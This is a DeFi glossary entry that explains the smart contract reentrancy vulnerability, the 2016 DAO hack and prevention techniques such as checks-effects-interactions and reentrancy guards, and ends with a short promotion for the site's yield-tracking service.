SKIP TO CONTENT
Security

Reentrancy

A vulnerability where a contract can be called again before its first execution completes.

What is Reentrancy?

Reentrancy is a smart contract vulnerability that occurs when a contract makes an external call before updating its internal state, allowing the called contract to re-enter and execute the vulnerable function again before the first call completes. This recursive calling can drain funds or corrupt state by exploiting the gap between the external call and state update. One of the most dangerous and common vulnerability patterns in smart contracts.

The Classic Reentrancy Attack

The infamous DAO hack of 2016 exploited reentrancy, changing blockchain history forever. The vulnerable pattern: check balance, send ETH to user, then update balance. When sending ETH, the recipient's receive/fallback function could call back into the withdrawal function. Since the balance was not yet updated, the check passed again, allowing multiple withdrawals of the same funds in a single transaction.

This attack drained approximately 3.6 million ETH (around $50 million at the time) and ultimately led to the contentious Ethereum/Ethereum Classic chain split as the community debated whether to reverse the theft.

Reentrancy Patterns

Beyond simple ETH transfers, reentrancy can occur through any external call: ERC-20 tokens with transfer hooks (ERC-777), ERC-721 NFT transfers with onERC721Received callbacks, or any explicit contract calls. Cross-function reentrancy exploits shared state across multiple functions in the same contract. Read-only reentrancy manipulates view functions or oracles during execution.

Modern attacks have become sophisticated. Cross-protocol reentrancy exploits composability. Contract A calls protocol B, which triggers callback to contract A in an unexpected intermediate state. View function reentrancy can manipulate oracle readings or share price calculations during execution, affecting pricing in other transactions.

Prevention Techniques

The checks-effects-interactions pattern is the primary defense: perform all checks, update all state (effects), then make external calls (interactions). This ensures any re-entry finds already-updated state reflecting the operation in progress.

Reentrancy guards (mutexes) prevent any re-entry during function execution by using a state variable lock. OpenZeppelin's ReentrancyGuard is widely used. Pull-over-push patterns let users withdraw funds themselves rather than contracts pushing funds to recipients.

Examples

  • The 2016 DAO hack exploited reentrancy to drain 3.6 million ETH through recursive withdrawal calls

Related Terms

Theory meets practice. See current rates across DeFi.

Track live yields, compare protocols, and build your DeFi portfolio with Fensory.

GET EARLY ACCESSArrow right
← BACK TO GLOSSARY